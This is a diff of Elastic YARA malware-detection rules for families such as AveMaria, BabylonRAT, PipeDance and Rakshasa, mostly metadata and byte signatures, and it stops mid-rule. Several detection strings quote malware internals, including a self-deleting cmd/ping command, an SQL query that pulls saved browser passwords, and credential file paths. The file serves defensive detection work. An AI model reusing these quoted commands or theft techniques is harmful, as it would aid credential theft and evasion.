"4e31426e-d62e-4b6d-911b-4223e1f6adef" - date = "2021-07-21" - modified = "2021-08-23" + id = "8aabdd5e-1ce7-4257-abaa-8d02dc6856a6" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Smokeloader.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174" - logic_hash = "44ac7659964519ae72f83076bcd1b3e5244eb9cadd9a3b123dda78b0e9e07424" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Gmer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7" + logic_hash = "acdab89a7703a743927cec60fbc84af2fd469403bee6f211c865fb96e9c92498" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277" - severity = 100 + tags = "FILE" + fingerprint = "960721d4d111a670907fe7d3ce01dfd134ad03a2d8440a945c75a7d46de46238" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a = { 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0 } + $str1 = "\\gmer64.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Windows_Trojan_Smokeloader_4Ee15B92 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Fplayer_1C1Fae37 : FILE MEMORY { meta: - description = "Detects Windows Trojan Smokeloader (Windows.Trojan.Smokeloader)" + description = "Detects Macos Trojan Fplayer (MacOS.Trojan.Fplayer)" author = "Elastic Security" - id = "4ee15b92-c62f-42d2-bbba-1dac2fa5644f" - date = "2022-02-17" - modified = "2022-04-12" + id = "1c1fae37-8d19-4129-a715-b78163f93fd2" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Smokeloader.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "09b9283286463b35ea2d5abfa869110eb124eb8c1788eb2630480d058e82abf2" - logic_hash = "7d5ba6a4cc1f1b87f7ea1963b41749f5488197ea28b31f20a235091236250463" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Fplayer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725" + logic_hash = "0d65717bdbac694ffb2535a1ff584f7ec2aa7b553a08d29113c6e2bd7b2ff1aa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5d2ed385c76dbb4c1c755ae88b68306086a199a25a29317ae132bc874b253580" + fingerprint = "abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 24 34 30 33 33 8B 45 F4 5F 5E 5B C9 C2 10 00 55 89 E5 83 EC } + $a = { 56 41 55 41 54 53 48 83 EC 48 4D 89 C4 48 89 C8 48 89 D1 49 89 F6 49 89 FD 49 } condition: all of them } -rule ELASTIC_Windows_Trojan_Smokeloader_Ea14B2A5 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Avemaria_31D2Bce9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Smokeloader (Windows.Trojan.Smokeloader)" + description = "Detects Windows Trojan Avemaria (Windows.Trojan.AveMaria)" author = "Elastic Security" - id = "ea14b2a5-ea0d-4da2-8190-dbfcda7330d9" - date = "2023-05-03" - modified = "2023-06-13" + id = "31d2bce9-3266-447b-9a2d-57cf11a0ff1f" + date = "2021-05-30" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Smokeloader.yar#L41-L60" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "15fe237276b9c2c6ceae405c0739479d165b406321891c8a31883023e7b15d54" - logic_hash = "8a96985902f82979f1512d4d30cfa41fd23562b8f86bf2f722351ef2adf4365f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_AveMaria.yar#L1-L31" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b" + logic_hash = "7ba59c3be07e35b415719b60b14a0f629619e5729c20f50f00dbea0c2f8bd026" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "950ce9826fdff209b6e03c70a4f78b812d211a2a9de84bec0e5efe336323001b" + fingerprint = "8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100695,88 +101162,69 @@ rule ELASTIC_Windows_Trojan_Smokeloader_Ea14B2A5 : FILE MEMORY os = "windows" strings: - $a1 = { AC 41 80 01 AC 41 80 00 AC 41 80 00 AC 41 C0 00 AC 41 80 01 } - $a2 = { AC 41 80 00 AC 41 80 07 AC 41 80 00 AC 41 80 00 AC 41 80 00 } + $a1 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q " ascii fullword + $a2 = "SMTP Password" wide fullword + $a3 = "select signon_realm, origin_url, username_value, password_value from logins" ascii fullword + $a4 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" wide fullword + $a5 = "for /F \"usebackq tokens=*\" %%A in (\"" wide fullword + $a6 = "\\Torch\\User Data\\Default\\Login Data" wide fullword + $a7 = "/n:%temp%\\ellocnak.xml" wide fullword + $a8 = "\"os_crypt\":{\"encrypted_key\":\"" wide fullword + $a9 = "Hey I'm Admin" wide fullword + $a10 = "\\logins.json" wide fullword + $a11 = "Accounts\\Account.rec0" ascii fullword + $a12 = "warzone160" ascii fullword + $a13 = "Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper" wide fullword condition: - all of them + 8 of ($a*) } -rule ELASTIC_Windows_Trojan_Smokeloader_De52Ed44 : FILE MEMORY +rule ELASTIC_Macos_Virus_Pirrit_271B8Ed0 : FILE MEMORY { meta: - description = "Detects Windows Trojan Smokeloader (Windows.Trojan.Smokeloader)" + description = "Detects Macos Virus Pirrit (MacOS.Virus.Pirrit)" author = "Elastic Security" - id = "de52ed44-062c-4b0d-9a41-1bfc31a8daa9" - date = "2023-05-04" - modified = "2023-06-13" + id = "271b8ed0-937a-4be6-aecb-62535b5aeda7" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Smokeloader.yar#L62-L81" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c689a384f626616005d37a94e6a5a713b9eead1b819a238e4e586452871f6718" - logic_hash = "95a60079a316016ca3f78f18e7920b962f5770bef4211dd70e37f45bbe069406" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Pirrit.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7feda05d41b09c06a08c167c7f4dde597ac775c54bf0d74a82aa533644035177" + logic_hash = "cb77f6df1403afbc7f45d30551559b6de7eb1c3434778b46d31754da0a1b1f10" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "950db8f87a81ef05cc2ecbfa174432ab31a3060c464836f3b38448bd8e5801be" + fingerprint = "12b09b2e3a43905db2cfe96d0fd0e735cfc7784ee7b03586c5d437d7c6a1b422" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a1 = { 08 31 FF 89 7D CC 66 8C E8 66 85 C0 74 03 FF 45 CC FF 53 48 } - $a2 = { B0 8F 45 C8 8D 45 B8 89 38 8D 4D C8 6A 04 57 6A 01 51 57 57 } + $a = { 35 4A 6A 00 00 32 80 35 44 6A 00 00 75 80 35 3E 6A 00 00 1F 80 35 38 6A 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Lurker_0Ee51802 : FILE -{ - meta: - description = "Detects Windows Trojan Lurker (Windows.Trojan.Lurker)" - author = "Elastic Security" - id = "0ee51802-4ff3-4edf-95ed-bb0338ff25d9" - date = "2022-04-04" - modified = "2022-06-09" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Lurker.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5718fd4f807e29e48a8b6a6f4484426ba96c61ec8630dc78677686e0c9ba2b87" - logic_hash = "782926c927dce82b95e51634d5607c474937e1edc0f7f739acefa0f4c03aa753" - score = 75 - quality = 75 - tags = "FILE" - fingerprint = "c30bc4e25c1984268a3bb44c59081131d1e81254b94734f6af2b47969c0acd0e" - severity = 50 - arch_context = "x86" - scan_context = "file" - license = "Elastic License v2" - os = "windows" - - strings: - $str1 = "\\Device\\ZHWLurker0410" wide fullword - - condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 -} -rule ELASTIC_Windows_Trojan_Clipbanker_7Efaef9F : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Iox_98Cd1Cd8 : FILE MEMORY { meta: - description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" + description = "Detects Windows Hacktool Iox (Windows.Hacktool.Iox)" author = "Elastic Security" - id = "7efaef9f-51cd-4fea-a48d-fa9d39cb735e" - date = "2022-02-28" - modified = "2022-04-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Clipbanker.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "02b06acb113c31f5a2ac9c99f9614e0fab0f78afc5ae872e46bae139c2c9b1f6" - logic_hash = "fa547d7c1623b332ef306672dd2293b44016d9974c1a3ec4b15e5ae0483ff879" + id = "98cd1cd8-8a0c-489e-86d1-58da88dc2c71" + date = "2024-01-24" + modified = "2024-01-29" + reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Iox.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d4544a521d4e6eb07336816b1aae54f92c5c4fd2eb31dcfbdf26e4ef890e73db" + logic_hash = "d7f9e4f399410d54416e974fbd66b2caa27359ae0f2e33e01d62f1aa618daa34" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fe0ec44f8707cd03f845dbea4ff5bb1b699db1b69b75f0365168a75cc8bb68a3" + fingerprint = "8c0f4041223713bef105ca5986b9ec30b4bfb22aeeab8f4465938cf8212fc7c1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100784,32 +101232,31 @@ rule ELASTIC_Windows_Trojan_Clipbanker_7Efaef9F : FILE MEMORY os = "windows" strings: - $a1 = "C:\\Users\\youar\\Desktop\\Allcome\\Source code\\Build\\Release\\Build.pdb" ascii fullword - $b1 = "https://steamcommunity.com/tradeoffer" ascii fullword - $b2 = "/Create /tn NvTmRep_CrashReport3_{B2FE1952-0186} /sc MINUTE /tr %s" ascii fullword - $b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" ascii fullword - $b4 = "ProcessHacker.exe" ascii fullword + $param_check_b0 = { 48 83 FB 05 0F 85 ?? ?? ?? ?? 81 38 70 72 6F 78 66 0F 1F 44 00 00 0F 85 ?? ?? ?? ?? 80 78 04 79 0F 85 ?? ?? ?? ?? 48 83 F9 03 } + $param_check_b1 = { 48 8B 14 24 4C 8B 5C 24 18 4C 8B 64 24 08 4C 8B 6C 24 08 4C 8B 7C 24 20 66 0F 1F 84 00 00 00 00 00 48 83 FB 03 0F 85 ?? ?? ?? ?? 66 81 38 66 77 0F 85 ?? ?? ?? ?? 80 78 02 64 } + $param_check_b2 = { 81 38 2D 2D 6C 6F 0F 1F 44 00 00 0F 85 ?? ?? ?? ?? 66 81 78 04 63 61 0F 85 ?? ?? ?? ?? 80 78 06 6C } + $param_check_b3 = { 83 FA 05 0F 85 ?? ?? ?? ?? 81 38 2D 2D 6B 65 0F 85 ?? ?? ?? ?? 80 78 04 79 90 } condition: - all of them + 3 of them } -rule ELASTIC_Windows_Trojan_Clipbanker_B60A50B8 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Babylonrat_0F66E73B : FILE MEMORY { meta: - description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" + description = "Detects Windows Trojan Babylonrat (Windows.Trojan.Babylonrat)" author = "Elastic Security" - id = "b60a50b8-91a4-49a7-bd05-fa4cc1dee1ac" - date = "2022-02-28" - modified = "2022-04-12" + id = "0f66e73b-7824-46b6-a9e6-5abf018c9ffa" + date = "2021-09-02" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Clipbanker.yar#L25-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "02b06acb113c31f5a2ac9c99f9614e0fab0f78afc5ae872e46bae139c2c9b1f6" - logic_hash = "fe585ab7efbc3b500ea23d1c164bc79ded658001e53fc71721e435ed7579182a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Babylonrat.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4278064ec50f87bb0471053c068b13955ed9d599434e687a64bf2060438a7511" + logic_hash = "66223dc9e2ef7330e26c91f0c82c555e96e4c794a637ab2cbe36410f3eca202a" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "097bb88d8482a4915c19affc82750c7ee225b89f2611ea654cfc3c044aae0738" + fingerprint = "3998824e381f51aaa2c81c12d4c05157c642d8aef39982e35fa3e124191640ea" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100817,57 +101264,59 @@ rule ELASTIC_Windows_Trojan_Clipbanker_B60A50B8 : FILE MEMORY os = "windows" strings: - $a1 = { 40 66 0F F8 C1 0F 11 40 A0 0F 10 84 15 08 FF FF FF 83 C2 40 } + $a1 = "BabylonRAT" wide fullword + $a2 = "Babylon RAT Client" wide fullword + $a3 = "ping 0 & del \"" wide fullword + $a4 = "\\%Y %m %d - %I %M %p" wide fullword condition: all of them } -rule ELASTIC_Windows_Trojan_Clipbanker_F9F9E79D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Sysrv_85097F24 : FILE MEMORY { meta: - description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" + description = "Detects Linux Trojan Sysrv (Linux.Trojan.Sysrv)" author = "Elastic Security" - id = "f9f9e79d-ce71-4b6c-83e0-ac6e06252c25" - date = "2022-04-23" - modified = "2022-06-09" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Clipbanker.yar#L45-L63" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c" - logic_hash = "a71d75719133e8b84956ec002cb31f82386ef711fa2af79d204d176492cd354b" + id = "85097f24-2e2e-41e4-8769-dca7451649cc" + date = "2021-06-28" + modified = "2021-09-16" + reference = "17fbc8e10dea69b29093fcf2aa018be4d58fe5462c5a0363a0adde60f448fb26" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Sysrv.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "96bee8b9b0e9c2afd684582301f9e110fd08fcabaea798bfb6259a4216f69be1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd" - severity = 100 + fingerprint = "1cad651c92a163238f8d60d2e3670f229b4aafd6509892b9dcefe014b39c6f7d" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 } + $a = { 32 26 02 0F 80 0C 0A FF 0B 02 02 22 04 2B 02 16 02 1C 01 0C 09 } condition: all of them } -rule ELASTIC_Windows_Trojan_Clipbanker_787B130B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pipedance_01C18057 : FILE MEMORY { meta: - description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" + description = "Detects Windows Trojan Pipedance (Windows.Trojan.PipeDance)" author = "Elastic Security" - id = "787b130b-6382-42f0-8822-fce457fa940d" - date = "2022-04-24" - modified = "2022-06-09" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Clipbanker.yar#L65-L87" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c" - logic_hash = "88783bde7014853f6556c6e7ee2dfd5cd5fcbfb4523ed158b4287e2bfba409f1" + id = "01c18057-258d-4242-928c-26972a2f1e76" + date = "2023-02-02" + modified = "2023-02-22" + reference = "https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PipeDance.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9d3f739e35182992f1e3ade48b8999fb3a5049f48c14db20e38ee63eddc5a1e7" + logic_hash = "0c03a725ae930eb829d6a6a9f681489d61aa7f69e72b6b298776f75a98115398" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699" + fingerprint = "01b8c127974ec8e3db0fc68db8d11cd4f4247c0128a8630f64c7bd20726220af" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100875,293 +101324,311 @@ rule ELASTIC_Windows_Trojan_Clipbanker_787B130B : FILE MEMORY os = "windows" strings: - $mutex_setup = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? } - $new_line_check = { 0F B7 C2 89 45 ?? 0F B7 C2 83 F8 0A 74 ?? BA 0D 0A 00 00 66 3B C2 74 ?? 83 F8 0D 74 ?? 83 F8 20 74 ?? 83 F8 09 74 ?? } - $regex1 = { 0F B7 C2 89 45 ?? 0F B7 C2 83 F8 0A 74 ?? BA 0D 0A 00 00 66 3B C2 74 ?? 83 F8 0D 74 ?? 83 F8 20 74 ?? 83 F8 09 74 ?? } - $regex2 = { 6A 34 59 66 39 0E 75 ?? 0F B7 46 ?? 6A 30 5A 83 F8 41 74 ?? 83 F8 42 74 ?? 66 3B C2 74 ?? 83 F8 31 74 ?? 83 F8 32 74 ?? 83 F8 33 74 ?? 66 3B C1 74 ?? 83 F8 35 74 ?? 83 F8 36 74 ?? 83 F8 37 74 ?? 83 F8 38 74 ?? 83 F8 39 75 ?? } - $regex3 = { 56 8B F1 56 FF 15 ?? ?? ?? ?? 83 F8 5F 0F 85 ?? ?? ?? ?? 6A 38 59 66 39 0E 75 ?? 0F B7 46 ?? 6A 30 5A 83 F8 41 74 ?? 83 F8 42 74 ?? 66 3B C2 74 ?? 83 F8 31 74 ?? 83 F8 32 74 ?? 83 F8 33 74 ?? 83 F8 34 74 ?? 83 F8 35 74 ?? 83 F8 36 74 ?? 83 F8 37 74 ?? 66 3B C1 74 ?? 83 F8 39 75 ?? } + $str1 = "%-5d %-30s %-4s %-7d %s" wide fullword + $str2 = "PID Name Arch Session User" wide fullword + $str3 = "%s %7.2f B" wide fullword + $str4 = "\\\\.\\pipe\\%s.%d" ascii fullword + $seq_rc4 = { 8D 46 ?? 0F B6 F0 8A 14 3E 0F B6 C2 03 C1 0F B6 C8 89 4D ?? 8A 04 0F 88 04 3E 88 14 0F 0F B6 0C 3E 0F B6 C2 03 C8 0F B6 C1 8B 4D ?? 8A 04 38 30 04 0B 43 8B 4D ?? 3B 5D ?? 72 ?? } + $seq_srv_resp = { 8B CE 50 6A 04 5A E8 ?? ?? ?? ?? B8 00 04 00 00 8D 4E ?? 50 53 8B D0 E8 ?? ?? ?? ?? B8 08 02 00 00 8D 8E ?? ?? ?? ?? 50 57 8B D0 E8 ?? ?? ?? ?? } + $seq_cmd_dispatch = { 83 FE 29 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE 06 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 33 D2 2B C2 0F 84 ?? ?? ?? ?? 83 E8 01 } + $seq_icmp = { 59 6A 61 5E 89 45 ?? 8B D0 89 5D ?? 2B F0 8D 04 16 8D 4B ?? 88 0A 83 F8 77 7E ?? 80 E9 17 88 0A 43 42 83 FB 20 } condition: - any of them + 4 of ($str*) or 2 of ($seq*) } -rule ELASTIC_Linux_Trojan_Generic_402Be6C5 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Segwin_04A3962E : FILE { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Name: segwindrvx64.sys, Version: 100.0.7.2" author = "Elastic Security" - id = "402be6c5-a1d8-4d7a-88ba-b852e0db1098" - date = "2021-01-12" - modified = "2021-09-16" + id = "04a3962e-4622-4d83-b0e7-4d77c8a81ab6" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d30a8f5971763831f92d9a6dd4720f52a1638054672a74fdb59357ae1c9e6deb" - logic_hash = "b32111972bc21822f0f2c8e47198c90b70e78667410175257b9542c212fc3a1d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Segwin.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd" + logic_hash = "1e9ba5fc78f2b4eeee56314c9e8cf3071817d726b44cb8510f8d7069e85ab7bf" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "1e906f5a06f688084edf537ead0b7e887bd9e0fcc39990c976ea8c136dc52624" - severity = 100 + tags = "FILE" + fingerprint = "e3c5441e4c26f7c5ba5db8a4b7618d870a5dd7b70d9373d80d81497bc0f73739" + threat_name = "Windows.VulnDriver.Segwin" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C0 52 4C 95 42 11 01 64 E9 D7 39 E4 89 34 FA 48 01 02 C1 3B 39 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 73 00 65 00 67 00 77 00 69 00 6E 00 64 00 72 00 76 00 78 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x64][\x00-\x00])([\x00-\x02][\x00-\x00])([\x00-\x07][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x63][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x64][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x06][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Generic_5420D3E7 : FILE MEMORY +rule ELASTIC_Multi_Hacktool_Rakshasa_D5D3Ef21 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Multi Hacktool Rakshasa (Multi.Hacktool.Rakshasa)" author = "Elastic Security" - id = "5420d3e7-012f-4ce0-bb13-9e5221efa73e" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "103b8fced0aebd73cb8ba9eff1a55e6b6fa13bb0a099c9234521f298ee8d2f9f" - logic_hash = "8ba3566ec900e37f05f11d40c65ffe1dfc587c553fa9c28b71ced7a9a90f50c3" + id = "d5d3ef21-e004-4cb4-8f9f-541e831c8e08" + date = "2024-01-24" + modified = "2024-01-29" + reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Hacktool_Rakshasa.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ccfa30a40445d5237aaee1e015ecfcd9bdbe7665a6dc2736b28e5ebf07ec4597" + logic_hash = "123cbea0ce02012a9b22a4a241d11aa9acbb58b50a1bd9228da7cadbf0fa1b4e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e81615b5756c2789b9be8fb10420461d5260914e16ba320cbab552d654bbbd8a" + fingerprint = "bd25f85a419679d2278e2e3951531950296785ac888bc69b513bab0a9936eacf" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 63 00 5F 5A 4E 34 41 52 43 34 37 65 6E 63 72 79 70 74 45 50 63 } + $a1 = { 35 B8 00 00 00 48 89 74 24 38 48 89 5C 24 40 48 89 4C 24 48 48 89 54 } + $a2 = "rakshasa/server.init.4.func2" ascii fullword + $a3 = "type..eq.rakshasa/server.Conn" ascii fullword + $a4 = "rakshasa_lite/aes.Str2bytes" ascii fullword + $a5 = "rakshasa_lite/server.doShellcode" ascii fullword condition: - all of them + 2 of them } -rule 